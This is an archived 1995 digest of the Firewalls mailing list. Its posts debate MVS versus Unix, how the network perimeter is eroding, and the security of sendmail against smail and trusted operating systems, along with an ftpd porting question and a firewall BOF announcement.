Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..."
  - Terry Pratchett "Moving Pictures".
From firewalls-owner Thu Sep 14 02:00:07 1995
Date: Thu, 14 Sep 1995 09:03:17 +0100 (BST)
From: Martin Hepworth
To: Firewalls@Greatcircle.COM
Subject: Re: MVS v Unix - was:Interpreting CERT advisories
In-Reply-To: <199509130255.WAA19687@zork.tiac.net>

OK then, if MVS is so good on TCP/IP how come sendmail on MVS is thick enough to believe any old FROM: that you tell it, hence the OLGA mail spoofs!

Before this gets (!) into a full scale MVS/Unix war let's face it, every system has holes, just some are better known than others.

my 2p

Martin
------------------------------------------------------------------
Martin Hepworth,                 email work: max@airtechsms.co.uk
Racal-Airtech, UK                email home: mgh@cityscape.co.uk
Voice: +44(0)1844 201800         http://www.gold.net/users/ef67/
FAX:   +44(0)1844 201832         PGP Key on request
Padgett's rule: WYDSIWGY "What you don't see is what gets you".
All opinions are mine, mine, all mine................
From firewalls-owner Thu Sep 14 03:00:07 1995
From: zen@flying.fish.com
Message-Id: <199509140927.CAA02217@flying.fish.com>
Date: Thu, 14 Sep 1995 02:27:57 -0700
In-Reply-To: blymn@awadi.com.AU (Brett Lymn) "Re: MVS religious war, was MVS vs the world" (Sep 14, 17:09)
To: blymn@awadi.com.AU (Brett Lymn)
Subject: Re: MVS religious war, was MVS vs the world
Cc: firewalls@greatcircle.com

> According to d:
> >Ahem. Surely you mean:
> > [...]
> Aww c'mon - you should sort the list so the fanatics can find their
> entry (though, for some it would not matter from what I have seen...)
> for $OS (sort keys %list_of_OS) {
>     print "$OS people will defend $list_of_OS{$OS} operating system...\n";
> }

Unfortunately, that would sort on the first digit of the number of people. Not too useful.
--
d

From firewalls-owner Thu Sep 14 03:30:04 1995
From: blymn@awadi.com.AU (Brett Lymn)
Message-Id: <9509141019.AA12321@bunya.awadi>
Subject: Re: MVS religious war, was MVS vs the world
To: firewalls@greatcircle.com
Date: Thu, 14 Sep 1995 19:49:26 +0930 (CST)

According to zen@flying.fish.com:
>
>
>> According to d:
>> >Ahem. Surely you mean:
>> > [...]
>> Aww c'mon - you should sort the list so the fanatics can find their
>> entry (though, for some it would not matter from what I have seen...)
>> for $OS (sort keys %list_of_OS) {
>>     print "$OS people will defend $list_of_OS{$OS} operating system...\n";
>> }
>
>Unfortunately, that would sort on the first digit of the number
>of people. Not too useful.
>

Uh Oh you did not initialise list_of_os, so I assumed it to be something like:

    %list_of_os = (
        "HP Unix",   "HPUX",
        "Solaris 2", "SYSV",
        "SunOS",     "BSD",
        "SCO",       "SCO"
        ...
    );

I thought that because you were using an associative array that you weren't going to treat it like a normal [] array - oops :-)

--
Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"It's fifteen hundred miles to Ankh-Morpork" he said.
"We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..."
  - Terry Pratchett "Moving Pictures".

From firewalls-owner Thu Sep 14 03:32:44 1995
Date: Thu, 14 Sep 1995 11:29:02 +0100 (BST)
From: Dave Roberts
To: Firewalls Mailing List
Subject: ftpd source for SCO?

I am trying to compile a version of the ftpd, on a SCO platform for a client who wants extra logging information. A problem seems to stem from the fact that all source I can get hold of seems to be written for BSD/OS, FreeBSD or NetBSD, and they make use of fdopen on the socket to create a file stream pointer. SCO doesn't like this, and cores with a memory fault if you try to do an fwrite(2) on this stream.

Does anyone know of SVR4 compliant ftpd's that I can get the source for? Or anything else that may help me out?
TIA - Dave

Dave Roberts               | "Just paddling out into big surf is a total
Unix Systems Administrator | commitment" * "You can't just call time-out
SAA Consultants Ltd        | and stroll on back to the beach if you don't
Plymouth, UK               | like the way things are going" - Point Break

From firewalls-owner Thu Sep 14 05:00:01 1995
Message-Id: <9509141438.AA4051@notes>
To: firewalls-digest
From: Warren Moore
Date: 14 Sep 95 7:34:39 EDT
Subject: Re: MVS vs the world

In Firewalls-Digest V4 #525 cjolley@iac.net do say:

> I still have mine, but it does not explain what the following code does:
>
>     BALR 3,0
>
>     BALR 3,3

It's been 20 or so years, but without seeing it could be anything from a basic parsing routine (Reg 0 & 1 were typically input), to a realllly tight loop.

By the way guys...we all need to face the fact that there are *some* things the UNIX world will do better than the MVS world, and there are *some* things the MVS world will do better than the UNIX world. For instance, I'm still looking for the first bullet-proof UNIX-based application that will handle OLTP systems of the size demanded by most telecommunications providers.
(E.g., an existing long-lines circuit provisioning system that has ONE equipment database (out of 150+ other databases) that is so large it has to be split into 4 separate dbs simply because any other configuration exceeds available VSAM address space...um, and for the non-IBMmers out there, that's Real Big). Client/Server simply doesn't have the grunt to either reliably or speedily handle those sorts of volumes...today. Maybe someday, but not now...and, by the way, the example given is for a real system, written originally at Bell Labs (birthplace of UNIX), and developed in BAL and PL/1 (about 7,000,000 lines of code). Think they knew something? :-)

Warren S. Moore, CISSP
Information Security Specialist
Cincinnati Bell Information Systems Inc.

From firewalls-owner Thu Sep 14 05:30:09 1995
Date: Thu, 14 Sep 1995 08:02:33 -0400 (EDT)
From: Mike Malik -- Dover DE
To: Bill Husler
cc: firewalls@GreatCircle.COM
Subject: Re: User Authentication
In-Reply-To: <199509131701.AA04818@interlock.mckesson.com>

On Wed, 13 Sep
1995, Bill Husler wrote:

> I've been being told that most companies are piling their resources
> (buck) on the authentication and not using traffic encryption because
> they feel that session assumptions is really more difficult than one
> would be led to believe and encryption represents considerable overhead.
> Any comments?
> Thanks,
> Bill

I have used the Cray Communication Frame-Relay Encryptor for a customer and they are very happy. The box works for FR WANs up to T1.

> The opinions expressed here-in are my own. Any similarities between these
> opinions and those of any other person - living or not - including my
> employer are purely coincidental.

Mike Malik (mam@ssds.com)
9841 Broken Land Parkway, Suite 100
Columbia, MD 21046
410-381-4313   FAX: 410-381-2170
business driven technology solutions

From firewalls-owner Thu Sep 14 06:02:44 1995
Message-Id: <9509141254.AA22598@wellspring.us.dg.com>
From: "Jim Carroll"
Organization: Data General (Canada) Inc.
To: firewalls@greatcircle.com
Date: Thu, 14 Sep 1995 08:53:03 -0500
Subject: Re: Firewall off Mortal Kombat XIV
Reply-To: jcarroll@wellspring.us.dg.com

Rumour has it that on 13 Sep 95 at 20:34, Marcus J. Ranum said:

> What does this all mean?
> It may mean that there's good
> job security in being a computer professional. It may mean that
> someone is going to look at the situation and announce that we
> have no clothes. I *HOPE* it means that someone will begin to
> think of new computer security paradigms. Who knows what they
> will be? I don't think we're going to win the war the way it's
> going.

Call it a hunch, but I suspect somehow you'll be responsible for at least initiating a new security paradigm. You seem to have an exceptional wargaming mindset which, through some obscure lateral thinking, will cause all the pieces to fall into place. Maybe it'll come to you in a dream. :)

Time to crack open those de Bono books....

Jim "that's enough hero worship for one day" Carroll

--
Jim Carroll - jcarroll@wellspring.us.dg.com
... the usual disclaimers ...
## The more I learn, the less I know.                ##
## Eventually I'll know everything about nothing.    ##

From firewalls-owner Thu Sep 14 06:31:54 1995
Message-Id: <9509141314.AA11050@damark.com>
From: "william.wells"
To: FIREWALLS
Subject: Firewall off Mortal Kombat XIV
Date: Thu, 14 Sep 95 08:08:00 +6C

In response to comments by 'mjr' and Jeff (which follow my writings):

Haven't we already seen that companies sell to the masses and the masses don't care about security?
People want Netscape over any other browser because it has critical mass and allows 'neat' stuff. Hot-Java will be the same: "I want the features". TIS' Gauntlet doesn't currently support secure HTTP so people in my company are getting modems to gain the feature that Gauntlet doesn't handle (by bypassing the firewall).

I'm looking for an HP/UX system admin: I looked at tons of resumes yesterday and found lots of DOS/Windows people. That tells me that our upcoming batch of programmers are going to base their programming skills on what PCs have; not great for Corporate security.

People are struggling with the concept of changing passwords; makes transferring files between systems too hard. They also complain about having to log into individual applications. People coming from the mainframe shops of the 70s and 80s generally have seen security work; not so with people whose only experience has been single user systems.

If the consumer wanted security, programmers would add it. The leading home financial software packages support passwords; why? because the people using their software don't want people snooping. When companies lose market share because of poor security, vendors will add it. This is what has happened with TCP/IP: people demanded it. We have browsers and FTP which understand firewalls and proxies because the vendors know they need to support them. Secure transactions on the Internet are getting high visibility because the credit card companies want to prevent valid card information from being stolen while it is being transmitted on the Internet and they are in a position to do something about it.

The problem with perimeters is that people are writing and getting distributed applications which, purposely or accidentally, circumvent security mechanisms.
If I can get you to run my package internally (because I'm the leading vendor), then I can add code which either circumvents your firewall or, if I can't do that, breaks a feature which information depositories on the Internet will use so that you will demand that your security people 'let it through'.

As for the comment about being 'behind the curve'. The example I use is NFS. It was written to fill a niche and has blossomed into code supported on most any TCP/IP system. There are more secure replacements available but critical mass and lack of widespread support assures they won't generally be used. NFS, itself, has known security holes which, because of its design. Because of its widespread use, it's doubtful that it will ever change much. Hence, NFS is 'behind the curve'. It is an insecure application which is a 'de-facto standard' which, fortunately, has such obvious security holes and other management issues that almost all Corporate types can recognize the security risks. Microsoft and Netscape could easily create and distribute insecure applications which put people who protect Corporate information 'behind the curve'. The discussions about embedding carefully crafted macros into Word documents shows how easily that can be done. (I don't mean to single out these 2 vendors, I could have used others just as well).

Anyway, I've been typing long enough. Time to get to work. On our order floor, I've gotten Windows secure enough that people generally can't access DOS or any other but the 2 Windows applications we want them to run. Now I need to get one vendor to disable the 'save/save as' options in their menus; those represent the only remaining known security holes in our highly controlled PC environment. (No, I don't want to discuss the implications of Windows 95...)

William Wells
Manager, Technical Support
Damark International, Inc
(views are mine)

Following is the mail from which all of this started....
}> problems I believe we (the security dweebs of the world) are going
}> to face in the next 5 years:
}
}> 1) The notion of "network perimeter" will erode to the point
}> where saying "protect all access into and out of your network"
}> will be greeted with hysterical giggles. Right now when I
}> say that many of my customers just look at me with a glazed
}> eyed expression as if to say, "pull the other one."
}
}I agree. It is getting easier and easier for holes to be punched
}through a large corporate "network perimeter". In my opinion (and
}unfortunate experience), insiders are probably the ones who will do
}the hole punching.
}> 3) The number of new network-aware and IP-aware apps is
}> now on an exponential growth curve. Consider, for a moment,
}> how the typical network app is developed today:
}>         Version 1: no security
}>         Version 2: security? next version
}>         Version 3: something lame
}> With the increase in network-permeation, the actual number
}> of things that "get it right" will be close to zero.
}
}It would probably take a number of drastic problems with a few network
}apps (like injuries or deaths or massive financial loss) before people
}get really serious about getting security into apps.
}
}> 4) I used to worry that the government's myopic views
}> on cryptography were going to keep us from building good
}> high-integrity APIs and tools into our infrastructure.
}> Now I realize I was naive: it is *TOO* *LATE* to fix it;
}> it has gotten too big.
}
}> What does this all mean? It may mean that there's good
}> job security in being a computer professional. It may mean that
}> someone is going to look at the situation and announce that we
}> have no clothes. I *HOPE* it means that someone will begin to
}> think of new computer security paradigms. Who knows what they
}> will be? I don't think we're going to win the war the way it's
}> going.
}
}2. Individual applications and hosts will become more hardened and
}secure.
}For old applications, small individual sized "firewall-wrappers"
}will become available. As the network perimeter erodes, it has to erode
}to the point of individual hosts or applications (or sets of hosts
}and applications). So hosts will either become secure or have some kind
}of secure wrapper/firewall. I like to think of the analogy of a filing
}cabinet. If you can't lock it, put it in a room that you can lock. If you
}can lock it, you can put it in a room that also can be locked.
}
}3. Enlightened companies will provide decent Internet access not only as
}a competitive measure, but as a way to ensure that its employees don't
}run off and create their own Internet access in a highly insecure and
}risky manner. As Brent has pointed out, if people need Net access to
}get their job done, they are probably going to find a way to get Net
}access. It's better for a company to do the Internet access job right
}instead of having employees construct some risky, insecure kluge.
}
}> mjr.
}
}--
}Jeff Sedayao
}Intel Corporation
}sedayao@argus.intel.com
}

From firewalls-owner Thu Sep 14 07:02:51 1995
Date: Thu, 14 Sep 1995 08:36:29 -0400
From: Ted Doty
Message-Id: <199509141236.IAA17959@kgbvax.network.com>
To: sedayao@argus.intel.com, mjr@iwi.com
Subject: Re: Firewall off Mortal Kombat XIV
In-Reply-To: Mail from 'sedayao@argus.intel.com (Jeffrey C. Sedayao)' dated: Wed, 13 Sep 95 23:41:06 PDT
Cc: firewalls@greatcircle.com

sedayao@argus.intel.com (Jeffrey C.
Sedayao) wrote:
>
> > 1) The notion of "network perimeter" will erode to the point
> > where saying "protect all access into and out of your network"
> > will be greeted with hysterical giggles. Right now when I
> > say that many of my customers just look at me with a glazed
> > eyed expression as if to say, "pull the other one."
>
> I agree. It is getting easier and easier for holes to be punched
> through a large corporate "network perimeter". In my opinion (and
> unfortunate experience), insiders are probably the ones who will do
> the hole punching.

Not necessarily. Given the frequency of hacked phone switches, the security of an internal (say) Frame Relay wan is pretty suspect. But insiders don't need to phreak to sniff the net. You're right, tho ... the personnel department gets hacked much more often by insiders than by outsiders.

All in all, the "hard crunchy shell around the soft chewy center" is looking more and more like the Maginot Line.

> 2. Individual applications and hosts will become more hardened and
> secure. For old applications, small individual sized "firewall-wrappers"
> will become available.

At the risk of being Yet Another Security Pinhead, this is the Wrong Thing To Do. If we think that the number of clueless boneheaded application developers is much larger than the number of clueless boneheaded kernel developers, then The Right Thing To Do is to put general security hooks in the kernel.

I'm fairly optimistic about something like IPSec combined with TCP wrappers; IPSec prevents anonymity, and the wrappers give you a modicum of access control. Let's fix it once (at the common - i.e. IP level), rather than having a million RFCs for "Privacy Enhanced Gopher". Then, if I STILL want to allow someone access into my system, I can't go crying to anyone when he zaps my disk partitions ...
--
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation    | phone: +1 301 596-2270
8965 Guilford Road, Suite 250            | fax:   +1 410 381-3320
Columbia, MD, 21046 USA                  | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Thu Sep 14 07:30:23 1995
Message-Id: <199509141408.JAA16576@psisa.com>
Subject: Re: Secure version of Sendmail
To: jgt10@amdahl.com (John G. Thompson)
Date: Thu, 14 Sep 1995 09:08:59 -0500 (CDT)
Cc: smith@sctc.com, firewalls@GreatCircle.COM
In-Reply-To: from "John G. Thompson" at Sep 13, 95 08:38:50 pm
From: chk@psa.pencom.com (Christian Kuhtz)

> > ..Sendmail is the only useful mail package out there. I'd be happy
> > to adopt anything which offers me Sendmail functionality in a more secure
> > fashion....
>
> Have you honestly looked at smail?

Yes, and there are some things that just don't work in Smail, and working on the code made me throw up several times. Sorry. I'm not an innocent newbie :).

NOTE: I'm comparing Sendmail V8 with Smail. And most of the times.. Smail just doesn't quite cut it. MHO.
Best Regards,
Chris

--
Christian Kuhtz                                    +1 914-684-4467
Pencom Systems Administration Services        fax: +1 914-684-3791

From firewalls-owner Thu Sep 14 07:32:44 1995
From: Rick Smith
Message-Id: <199509141427.JAA17333@shade.sctc.com>
Subject: Re: Secure version of Sendmail
To: Peter da Silva
Date: Thu, 14 Sep 1995 09:27:19 -0500 (CDT)
Cc: smith@sctc.com, firewalls@GreatCircle.COM
In-Reply-To: <9509132257.AA09837@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 13, 95 05:57:13 pm

> Of course a class B operating system is itself a large, capable, general
> purpose package.

True enough. The point is, you have to identify and exploit appropriate holes in both sendmail and in the nonbypassible access control mechanism of the OS.
A properly designed mechanism is going to present a different kind of penetration problem. I think it's less likely that an attacker will find appropriate holes in both simultaneously. And that's what security is about: increasing work factor and reducing the likelihood of a successful attack.

Rick.
smith@sctc.com        secure computing corporation

From firewalls-owner Thu Sep 14 08:03:01 1995
Message-Id: <199509141449.HAA08346@miles.greatcircle.com>
Date: Thu, 14 Sep 1995 10:48:17 -0400
From: gary flynn
To: firewalls-owner@GreatCircle.COM, mjr@iwi.com, sedayao@argus.intel.com
Subject: Re: Firewall off Mortal Kombat XIV
Cc: firewalls@GreatCircle.COM, hulveydb@falcon.jmu.edu

> From: Ted Doty
>
> sedayao@argus.intel.com (Jeffrey C. Sedayao) wrote:
> >
> > > 1) The notion of "network perimeter" will erode to the point
> > > where saying "protect all access into and out of your network"
> > > will be greeted with hysterical giggles. Right now when I
> > > say that many of my customers just look at me with a glazed
> > > eyed expression as if to say, "pull the other one."
> >
> > I agree. It is getting easier and easier for holes to be punched
> > through a large corporate "network perimeter". In my opinion (and
> > unfortunate experience), insiders are probably the ones who will do
> > the hole punching.
>
> Not necessarily. Given the frequency of hacked phone switches, the
> security of an internal (say) Frame Relay wan is pretty suspect. But
> insiders don't need to phreak to sniff the net.
You're right, tho ...
> the personnel department gets hacked much more often by insiders than
> by outsiders.
>
> All in all, the "hard crunchy shell around the soft chewy center" is looking
> more and more like the Maginot Line.
>
> > 2. Individual applications and hosts will become more hardened and
> > secure. For old applications, small individual sized "firewall-wrappers"
> > will become available.
>
> At the risk of being Yet Another Security Pinhead, this is the Wrong
> Thing To Do. If we think that the number of clueless boneheaded application
> developers is much larger than the number of clueless boneheaded kernel
> developers, then The Right Thing To Do is to put general security hooks in
> the kernel.
>
> I'm fairly optimistic about something like IPSec combined with TCP wrappers;
> IPSec prevents anonymity, and the wrappers give you a modicum of access
> control. Let's fix it once (at the common - i.e. IP level), rather than
> having a million RFCs for "Privacy Enhanced Gopher".
>

Isn't this what SecureWare's Hannah product does?

Can someone point me to a site that can tell me the progress of IPv6... both the protocols and implementations?
thanks, Gary Flynn James Madison University From firewalls-owner Thu Sep 14 08:15:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA06742 for firewalls-outgoing; Thu, 14 Sep 1995 07:09:38 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA06715 for ; Thu, 14 Sep 1995 07:09:27 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id JAA18011; Thu, 14 Sep 1995 09:05:49 -0400 Date: Thu, 14 Sep 1995 09:05:49 -0400 From: Ted Doty Message-Id: <199509141305.JAA18011@kgbvax.network.com> To: william.wells@damark.com, firewalls@greatcircle.com Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: Mail from '"william.wells" ' dated: Thu, 14 Sep 95 08:08:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk william.wells wrote: > If the consumer wanted security, programmers would add it. The leading > home financial software packages support passwords; why? because the > people using their software don't want people snooping. When companies > lose market share because of poor security, vendors will add it. This Well said. Mostly companies go out of business because they INCLUDE security features, which makes their product more costly, harder to use, slower, ... Yet another reason to put it in the kernel. > As for the comment about being 'behind the curve'. The example I use > is NFS. It was written to fill a niche and has blossomed into code > supported on most any TCP/IP system. There are more secure replacements > available but critical mass and lack of widespread support assures > they won't generally be used. NFS, itself, has known security holes > which, because of its design. Because of its widespread use, its > doubtful that it will ever change much. Hence, NFS is 'behind the > curve'. 
> It is an insecure application which is a 'de-facto standard'
> which, fortunately, has such obvious security holes and other
> management issues that almost all Corporate types can recognize the
> security risks.

Yet ANOTHER reason to do it in IP. If my mount program is brain damaged, and does silliness like exporting everything to the world because my command line was longer than 128 (or 156, or 212, or ...), then I'm STILL OK if I have decent authentication and access control in the kernel.

If we try to secure all applications, past, present, and future, then my son (turns 3 tomorrow!) will have a great future as an Internet Security Consultant. We should do it once, right.

-- - Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation | phone: +1 301 596-2270
8965 Guilford Road, Suite 250 | fax: +1 410 381-3320
Columbia, MD, 21046 USA | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Thu Sep 14 08:27:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07868 for firewalls-outgoing; Thu, 14 Sep 1995 07:33:51 -0700
Received: from [198.102.244.40] (pm-ppp-2.greatcircle.com [198.102.244.40]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07849; Thu, 14 Sep 1995 07:33:41 -0700
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 14 Sep 1995 10:33:14 -0800
To: sedayao@argus.intel.com (Jeffrey C. Sedayao), alan@mid.net (Alan Hannan)
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: firewall BOF at LISA/USENIX?
Cc: mjr@iwi.com, firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 10:45 PM 9/13/95, Jeffrey C.
Sedayao wrote: >[much deleted] > >> BTW - Those going to LISA/USENIX (that's you marcus) - what say you about >> organizing our own Beer/BOF at some time? Perhaps we all pile into my >> rented regal and raise security-hell at some local bar. Let me know if >>you're >> interested. > >Is there going to be a formal firewall BOF there at LISA/USENIX? If so, >when (day and time) will it be? Yes, it's scheduled for Thursday, 6:30pm to 7:30pm, immediately after the CERT BOF (at 6:00pm) and immediately before the reception. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Thu Sep 14 08:30:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08846 for firewalls-outgoing; Thu, 14 Sep 1995 08:01:45 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA08838 for ; Thu, 14 Sep 1995 08:01:41 -0700 Received: from vodka.sse.att.com (vodka.gc.att.com) by ig2.att.att.com id AA14902; Thu, 14 Sep 95 11:01:19 EDT Message-Id: <9509141501.AA14902@ig2.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Secure version of Sendmail To: peter@nmti.com (Peter da Silva) Date: Thu, 14 Sep 1995 11:02:00 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509132257.AA09837@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 13, 95 05:57:13 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter, > > > The point is, you *can't* guarantee that a large, capable, general > > purpose package is bug free, whether the bugs are security oriented or > > anything else. 
So you need something to backstop it, like Type > > Enforcement or maybe MLS protections. > > Of course a class B operating system is itself a large, capable, general > purpose package. > True, but the point is that you must break sendmail *and* the backstop before your intrusion will be successful. C2 and higher systems will be auditing sendmail's every move. If sendmail forks a shell or begins to access non mail-related files, a properly configured B level OS can detect that, and shut sendmail down and alert the administrator. Also hacking through a MLS or Type Enforcement system is not trivial. The same logic applies to the recent syslog problems. If your OS can monitor the daemons, it has a chance to detect when they've been overrun by means of yet another buffer overflow bug. That is why I am a strong advocate of running firewalls on trusted servers. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Thu Sep 14 08:32:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08046 for firewalls-outgoing; Thu, 14 Sep 1995 07:42:31 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA08039 for ; Thu, 14 Sep 1995 07:42:27 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id JAA29553; Thu, 14 Sep 1995 09:44:27 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 281620000; 14 Sep 95 10:41 CDT Received: from sctc.com by sccmailhost.sctc.com id 061380000; 14 Sep 95 10:40 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id JAA19986; Thu, 14 Sep 1995 09:40:38 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id JAA19663; Thu, 14 Sep 1995 09:40:37 -0500 From: Rick Smith Message-Id: <199509141440.JAA19663@shade.sctc.com> Subject: Re: Secure version of 
Sendmail To: "John G. Thompson" Date: Thu, 14 Sep 1995 09:40:37 -0500 (CDT) Cc: smith@sctc.com, firewalls@greatcircle.com In-Reply-To: from "John G. Thompson" at Sep 13, 95 08:38:50 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1022 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Have you honestly looked at smail? It doesn't really matter fundamentally whether the mail package is sendmail with its known, documented, and occasionally patched legion of bugs or some different hunk of software for the same purpose. In all cases, bugs will occasionally appear. The purpose of nonbypassable access control mechanisms like Type Enforcement is to prevent the inevitable bugs from allowing instant and complete compromise of the system. Even if today's version of "smail" is proven secure (unlikely) then where are we going to find the time/money/effort/expertise to prove that next years' patched version is also secure? And what about the incremental changes after that? At some point even the best designed and engineered software component will look like sendmail, especially packages in the public domain. It costs lots of money and effort to maintain design integrity across multiple releases, and that's a huge source of bugs right there. Rick. 
smith@sctc.com secure computing corporation From firewalls-owner Thu Sep 14 09:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10985 for firewalls-outgoing; Thu, 14 Sep 1995 08:43:21 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA10972 for ; Thu, 14 Sep 1995 08:43:16 -0700 Received: from offramp.dsccc.com by relay1.UU.NET with SMTP id QQzhec19711; Thu, 14 Sep 1995 11:42:14 -0400 Received: by offramp.dsccc.com (5.67b/SMI-V1.8) id AA20329; Thu, 14 Sep 1995 10:40:57 -0500 Received: from onramp(192.245.102.129) by offramp via smap (V1.3mjr) id sma020314; Thu Sep 14 10:40:42 1995 Received: from optilink.dsccc.com (optilink.optilink.dsccc.com [192.9.200.1]) by camelot.dsccc.com (8.6.11/8.6.10) with SMTP id KAA00383 for ; Thu, 14 Sep 1995 10:40:43 -0500 Received: from earth.optilink.dsccc.com by optilink.dsccc.com with smtp id m0stGP5-0002MIC; Thu, 14 Sep 95 08:40 PDT Received: by earth.optilink.dsccc.com id m0stGRE-0001PlC; Thu, 14 Sep 95 08:42 PDT Date: Thu, 14 Sep 95 08:42 PDT From: James_Dehnert@optilink.optilink.dsccc.com Message-Id: <9509140842.ZM5969@earth.optilink.dsccc.com> In-Reply-To: jgt10@amdahl.com (John G. Thompson) "Re: Secure version of Sendmail" (Sep 13, 9:48pm) References: X-Pgp-Print: 91 FE 2F C5 9F B3 ED 9F F9 CD C6 7F 87 FF F6 6E X-Mailer: Z-Mail (3.2.0 06sep94) To: firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 13, 9:48pm, John G. Thompson wrote: > Subject: Re: Secure version of Sendmail > > ..Sendmail is the only useful mail package out there out there. I'd be happy > > to adopt anything which offers me Sendmail functionality in a more secure > > fashion.... > > Have you honestly looked at smail? > > JGT > Here here! I use smail on all our machines. 
My basic config file is about 10 lines long. I have it up to 20 to do things a bit more uniformly but 10 lines does all I need. The way I look at it, the easier it is to configure, the less chance you're going to screw it up. It has also passed all the tests I have given it based on known sendmail problems.

--
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+=+
= James "Zeke" Dehnert Zeke_Dehnert@optilink.dsccc.com =
+ Unix Network Administrator (707) 792-7000 +
= DSC Access Products Div. Petaluma California =
+ The opinions represented herein are not necessarily those of DSC +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+==+=+=+=+=+=+=+=+=+=+=+=+=+=+=

From firewalls-owner Thu Sep 14 09:12:49 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08168 for firewalls-outgoing; Thu, 14 Sep 1995 07:45:53 -0700
Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA08161 for ; Thu, 14 Sep 1995 07:45:47 -0700
Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma021094; Thu Sep 14 10:43:12 1995
Posted-Date: Thu, 14 Sep 1995 10:43:54 -0400
From: "Bryan D. Boyle"
Message-Id: <9509141043.ZM5304@maverick.erenj.com>
Date: Thu, 14 Sep 1995 10:43:53 -0400
In-Reply-To: Ted Doty "Re: Firewall off Mortal Kombat XIV" (Sep 14, 8:36am)
References: <199509141236.IAA17959@kgbvax.network.com>
X-Phone: (908) 730-3338
X-Saying: Strange problems call for strange solutions.
X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s
X-Mailer: Z-Mail (3.2.1 10apr95)
To: firewalls@greatcircle.com
Subject: Re: Firewall off Mortal Kombat XIV
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sep 14, 8:36am, Ted Doty wrote:
>
> All in all, the "hard crunchy shell around the soft chewy center" is looking
> more and more like the Maginot Line.

